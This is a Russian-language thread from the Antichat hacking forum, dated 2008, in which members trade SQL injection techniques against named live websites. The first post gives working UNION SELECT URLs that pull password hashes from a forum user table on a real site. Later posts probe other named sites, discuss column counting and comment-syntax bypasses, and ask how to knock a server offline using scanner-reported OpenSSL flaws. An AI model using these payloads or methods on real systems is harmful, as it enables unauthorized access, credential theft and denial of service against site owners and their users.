HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.01.2008, 18:03
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Ну вот вам пример )

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+ita-forum.itaf_user/*

при таком запросе будет ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.itaf_user/*' AND p.program_active='on' AND p.program_teacher_id=t' at line 3

А если так

http://www.ankil.ru/ibs/ibs_program_tpl.php?program_id=-1'+union+select+1,user_pass,3,4,5,6,7,8,9,10,11,12 ,13+from+%60ita-forum%60.itaf_user/*

мы увидим хеш

Так что Scipio абсолютно прав
 
Ответить с цитированием

  #2  
Старый 06.01.2008, 02:47
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

http://kronverkcinema.ru/repertoire'/*
Пишет, что MySQL
Но мне сказали, что комментарий обрубается...скажи те как быть...или какие другие способы взлома))
 
Ответить с цитированием

  #3  
Старый 06.01.2008, 12:08
Masyoka
Новичок
Регистрация: 05.11.2007
Сообщений: 1
С нами: 9744260

Репутация: 0
По умолчанию

Хеллоу всем =D

Вопрос такой:
сканил один сайт и он нашел такую уязвимость

Подозрение на серьезную уязвимость
Множественные уязвимости (OpenSSL)
Описание

Краткое описание
Уязвимости позволяют удаленному атакующему выполнить произвольный код в системе или вызвать отказ в обслуживании приложения.
Подробное описание
1. Уязвимость существует из-за ошибки при обработке некорректных ASN.1 структур. Удаленный атакующий с помощью специального запроса может вызвать отказ в обслуживании приложения. Уязвимости подвержены все приложения использующие библиотеку OpenSSL для обработки ASN.1 данных.
Выпуски OpenSSL до версии 0.9.7 не содержат данную уязвимость.
2. Обработка публичных ключей определенного типа требует большого количества процессорного времени. Злоумышленник с помощью серии специальных запросов может вызвать отказ в обслуживании приложения.
3. Уязвимость переполнения буфера в функции "SSL_get_shared_ciphers()". Злоумышленник может отослать уязвимому приложению SSL запрос содержащий специальным образом сформированный список шифров, при обработке которых функцией "SSL_get_shared_ciphers()" произойдет переполнение буфера. Данная уязвимость при определенных обстоятельствах может быть использована атакующим для выполнения произвольного кода в системе.
4. Уязвимость существует в клиентских процедурах отвечающих за обработку SSLv2. Данная уязвимость может быть использована только для проведения DoS-атак направленных на клиентские приложения использующие уязвимую библиотеку OpenSSL.
Потенциально уязвимостям подвержены все приложения использующие уязвимую библиотеку OpenSSL.
Уязвимые версии
OpenSSL версии 0.9.7k и предыдущие
OpenSSL версии 0.9.8c и предыдущие
Использование уязвимости
Использование уязвимости удаленно: да
Использование уязвимости локально: да
Базовая оценка по системе CVSS
CVSS Base Score: 8
(AV:R/AC:L/Au:NR/C:P/I:P/A:C/B:N)
Ложные срабатывания (False Positives)
Вывод о наличии уязвимости сделан на основе версии по результатам идентификации сервисов и приложений на сканируемом узле. Если при установке обновления номер версии не менялся, возможно ложное обнаружение уязвимости.
Пропуск уязвимости (False Negatives)
Случаев пропуска уязвимости зарегистрировано не было. Причины возможных пропусков неизвестны.

и еще

Подозрение на уязвимость
DoS-атака (OpenSSL)
Описание

Обнаружено несколько уязвимостей в OpenSSL.
1. Обнаружена уязвимость нулевого указателя в функции do_change_cipher_spec(). Удаленный атакующий может послать серверу специально сформированное SSL/TLS рукопожатие (handshake), что заставит OpenSSL аварийно завершить работу.
2. Уязвимость обнаружена в SSL/TLS handshakes при включенном Kerberos шифровании. Удаленный атакующий может аварийно завершить работу службы.
3. OpenSSL некорректно обрабатывает неизвестные типы сообщений. Удаленный атакующий может специальным образом вызвать отказ в обслуживании.
Уязвимые версии:
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
OpenSSL Project OpenSSL 0.9.7

можно ли чем либо грохнуть попробывать?
Посовтеуйте, что вы об этом думаете.
 
Ответить с цитированием

  #4  
Старый 06.01.2008, 15:02
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
С нами: 10140806

Репутация: 932


По умолчанию

/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.
 
Ответить с цитированием

  #5  
Старый 06.01.2008, 15:16
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Цитата:
Сообщение от Ky3bMu4  
/* можно заменить на %2f%2a , но в данном случае это вроде ничего не даёт.
ну ты извращенец... не знаю что ты хочешь сделать но гг вообще то есть пара других способов начать комментарий...
К примеру два тире подряд --
__________________
Кто я?..
 
Ответить с цитированием

  #6  
Старый 06.01.2008, 16:05
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
С нами: 10140806

Репутация: 932


По умолчанию

Цитата:
К примеру два тире подряд --
Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда.
 
Ответить с цитированием

  #7  
Старый 06.01.2008, 16:57
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Цитата:
Сообщение от Ky3bMu4  
Ты уверен, что для mysql сервера прокатит? Мой пост был адресован сюда.
Уверен
__________________
Кто я?..
 
Ответить с цитированием

  #8  
Старый 07.01.2008, 15:35
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами: 10065986

Репутация: 785
По умолчанию

Для меня остается не понятной одна весЧь.

Код HTML:
http://www.mxftk.com/pub/page.php?id=-47
id=-47 - показывает главную страницу

id=47+order+by+10000/* - страницу отображает правильно.

Внимание! Впрос:) Можно ли както подобрать количество столбцов?
 
Ответить с цитированием

  #9  
Старый 07.01.2008, 15:37
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами: 10188326

Репутация: 1866


По умолчанию

trumps, там нет инъекции.
 
Ответить с цитированием

  #10  
Старый 07.01.2008, 15:38
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами: 10065986

Репутация: 785
По умолчанию

Цитата:
Сообщение от ice1k  
trumps, там нет инъекции.
Понятно . Спасибо.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.